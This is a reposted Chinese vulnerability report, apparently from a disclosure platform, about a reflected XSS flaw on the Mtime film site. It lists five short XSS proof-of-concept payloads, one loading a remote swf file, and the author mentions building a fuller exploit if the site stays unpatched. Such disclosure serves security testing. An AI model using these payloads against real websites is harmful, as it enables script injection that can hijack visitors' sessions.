好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

时光网一处XSS 5种打法 - 网站安全 - 自学php

漏洞 的危害其实是因需求而异,对于一次精心的 渗透 而言或许一个反射xss就够了.没被干过的厂商也不懂那份痛了.

 

1.jpg

 

 

poc1:<INPUT SRC="javascript:alert('XSS');">

 

poc2:<img src='#' onerror='alert("XSS")'>

 

poc3: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

 

poc4: <EMBED SRC="http://wooyun.org/xss.swf" ></EMBED>

 

poc5: <A href=http://HdhCmsTestgoogle测试数据/>link</A>

 

 

 

等2周看看,没补再构造利用. 

 

 

修复方案: 攻城师懂

 

查看更多关于时光网一处XSS 5种打法 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14860
  阅读:48次

上一篇: Tom某处高危Get型Csrf可直接导致用户帐户被劫持

下一篇:CSDN XSS第一弹:修复漏洞时指哪修哪的后果 - 网站

相关资讯